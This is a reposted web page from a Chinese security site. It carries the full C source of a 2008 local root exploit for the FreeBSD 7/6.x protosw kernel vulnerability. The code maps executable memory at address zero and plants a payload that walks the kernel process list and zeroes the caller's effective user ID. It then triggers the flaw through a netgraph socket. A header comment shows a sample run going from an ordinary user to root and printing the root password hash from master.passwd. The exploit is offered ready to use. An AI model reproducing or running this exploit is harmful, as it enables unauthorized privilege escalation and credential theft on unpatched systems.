首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreeBSD 7/6x protosw kernel exploit
来源:don.bailey@gmail.com 作者:Bailey 发布时间:2008-12-26  

/*
> uname -rs
FreeBSD 7.0-RELEASE
> id
uid=1001(donb) gid=1001(donb) groups=1001(donb),0(wheel)
> grep ^root /etc/master.passwd
grep: /etc/master.passwd: Permission denied
> nm /boot/kernel/kernel | grep allproc
c0bf26b8 B allproc
c0bf2670 B allproc_lock
> cc -o x x.c
> ./x 0xc0bf26b8
euid=0
> id
uid=1001(donb) gid=1001(donb) euid=0(root) groups=1001(donb),0(wheel)
> grep ^root /etc/master.passwd
root:$1$fuS6o3Qy$iFlUEpD9Y3ph7rOzMU/br1:0:0::0:0:Charlie &:/root:/bin/csh
*/


/*
 * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
 * defined here:
 * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
 *
 * This will overwrite your credential structure in the kernel. This will
 * affect more than just the exploit's process, which is why this doesn't
 * spawn a shell. When the exploit has finished, your login shell should
 * have euid=0.
 *
 * Enjoy, and happy holidays!
 *  - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
 */

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
 struct proc * p = (struct proc * )PATTERN1;
 uint * i;

 while(1)
 {
  if(p->p_pid == PATTERN2)
  {
   i = (uint * )p->p_ucred;
   *++i = 0;
   break;
  }

  p = p->p_list.le_next;
 }

 return 1;
}

int
main(int argc, char * argv[])
{
 ulong addr;
 uchar * c;
 uchar * d;
 uint * i;
 void * v;
 int pid;
 int s;

 if(argc != 2)
 {
  fprintf(stderr, "usage: ./x <allproc>\n");
  return 1;
 }

 addr = strtoul(argv[1], 0, 0);

 v = mmap(
  NULL,
  (PAGES*PAGE_SIZE),
  PROT_READ|PROT_WRITE|PROT_EXEC,
  MAP_ANON|MAP_FIXED,
  -1,
  0);
 if(v == MAP_FAILED)
 {
  perror("mmap");
  return 0;
 }

 c = v;
 d = (uchar * )x;
 while(1)
 {
  *c = *d;
  if(*d == 0xc3)
  {
   break;
  }

  d++;
  c++;
 }

 *c++ = 0xc3;

 c = v;
 while(1)
 {
  if(*(long * )c == PATTERN1)
  {
   *(c + 0) = addr >>  0;
   *(c + 1) = addr >>  8;
   *(c + 2) = addr >> 16;
   *(c + 3) = addr >> 24;
   break;
  }
  c++;
 }

 pid = getpid();
 while(1)
 {
  if(*(long * )c == PATTERN2)
  {
   *(c + 0) = pid >>  0;
   *(c + 1) = pid >>  8;
   *(c + 2) = pid >> 16;
   *(c + 3) = pid >> 24;
   break;
  }
  c++;
 }

 s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
 if(s < 0)
 {
  perror("socket");
  return 1;
 }

 shutdown(s, SHUT_RDWR);

 return 0;
}


 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SAWStudio 3.9i (prf File) Loca
·PSI remote integer overflow Do
·Acoustica Mixcraft <= 4.2 Univ
·Exploits joomla com_lowcosthot
·PHP-Fusion <= 7.0.2 Remote Bli
·Firefox, Internet Explorer, Op
·Joomla Component 5starhotels (
·BulletProof FTP Client 2.63 Lo
·IntelliTamper 2.07/2.08 (MAP F
·Oracle Pwnage Part 6 from DBA
·Microsoft Internet Explorer XM
·Amaya Web Browser <= 11.0.1 Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved